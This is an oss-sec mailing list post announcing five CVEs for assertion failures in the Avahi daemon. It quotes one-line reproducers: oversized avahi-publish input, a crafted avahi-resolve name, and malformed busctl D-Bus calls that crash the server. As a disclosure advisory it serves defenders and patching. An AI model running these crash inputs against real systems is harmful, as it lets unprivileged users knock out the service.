oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVEs assigned for reachable assertions in avahi

From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Fri, 6 Oct 2023 14:19:17 -0700
While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVE's being assigned for client requests that can
cause the Avahi server to abort with an assertion failure.  Only one of
them has a fix available so far.

----------------------------------------------------------------------------

CVE-2023-38469: https://github.com/lathiat/avahi/issues/455
 Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users
 (unless disable-user-service-publishing is set to yes explicitly):

 avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"

----------------------------------------------------------------------------

CVE-2023-38470: https://github.com/lathiat/avahi/issues/454
 Reachable assertion in avahi_escape_label

"avahi-resolve -n 
',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"

Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c

----------------------------------------------------------------------------

CVE-2023-38471: https://github.com/lathiat/avahi/issues/453
 Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

 busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"

----------------------------------------------------------------------------

CVE-2023-38472: https://github.com/lathiat/avahi/issues/452
 Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

  org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

 using

  avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

 from inside a client creating EntryGroups. It can be triggered by unprivileged
 users unless disable-user-service-publishing is set to yes explicitly.
 By default it's set to no."

----------------------------------------------------------------------------

CVE-2023-38473: https://github.com/lathiat/avahi/issues/451
  Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

--
        -Alan Coopersmith-                 alan.coopersmith () oracle com
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Previous By Date Next
Previous By Thread Next

Current thread: